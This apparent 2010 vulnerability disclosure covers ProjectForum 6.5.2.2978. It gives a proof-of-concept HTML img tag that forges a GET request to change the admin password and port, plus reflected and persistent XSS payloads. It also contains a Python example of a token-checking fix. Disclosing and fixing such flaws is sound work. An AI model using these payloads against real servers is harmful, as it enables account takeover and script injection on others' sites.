This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 13, 2010

ProjectForum 6.5.2.2978 XSRF / XSS

A cross-site request forgery vulnerability in ProjectForum 6.5.2.2978 can be exploited to reconfigure the server (e.g. admin password, create group password, port) with a malicious GET request.

PoC:
<html>
<body>
<img src="http://localhost/admin/site.html?adminpasswd=new_password&adminpasswd2=new_password&port=80&theme=default&createpasswd=new_password&createpasswd2=new_password&action=Save+Changes&formSubmitted=1" />
</body>
</html>
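
The server-side check that stops this request, as an added example rather than ProjectForum code: a settings handler that ignores GET and requires a per-session token in the POST body, shown beside a model of the behaviour the PoC relies on. The function names, the `csrf_token` field and the session dictionary are assumptions made for illustration.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Request from the PoC above, trimmed to three of its parameters.
POC_URL = ("http://localhost/admin/site.html"
           "?adminpasswd=new_password&adminpasswd2=new_password&formSubmitted=1")

# Constructed admin session; "csrf_token" is a hypothetical field name.
SESSION = {"csrf_token": secrets.token_urlsafe(32)}


def query_params(url):
    """Return the first value of each query-string parameter."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def accepts_vulnerable(method, url, form, session):
    """Assumed model of the flaw: any request with formSubmitted=1 is applied."""
    params = {**query_params(url), **form}
    return params.get("formSubmitted") == "1"


def accepts_hardened(method, url, form, session):
    """Apply settings only for a POST whose body carries the session's token."""
    if method != "POST":
        return False  # a GET, such as an <img> fetch, never changes state
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected:
        return False  # no token was issued for this session
    # Constant-time comparison; bytes avoid a TypeError on non-ASCII input.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False
    # Settings are read from the POST body only, never from the query string.
    return form.get("formSubmitted") == "1"


if __name__ == "__main__":
    good = {"adminpasswd": "x", "adminpasswd2": "x", "formSubmitted": "1",
            "csrf_token": SESSION["csrf_token"]}
    base = POC_URL.split("?")[0]
    print("vulnerable, PoC GET: ", accepts_vulnerable("GET", POC_URL, {}, SESSION))
    print("hardened, PoC GET:   ", accepts_hardened("GET", POC_URL, {}, SESSION))
    print("hardened, POST+token:", accepts_hardened("POST", base, good, SESSION))
```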



Several reflected and persistent cross-site scripting vulnerabilities are present.

PoC:
Reflected:
http://localhost/1/admin/newpage.html?name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Persistent:
Edit a page and add the following:
http://"onmouseover="alert(0)"style="position:absolute;top:0;left:0;width:9999px;height:9999px;
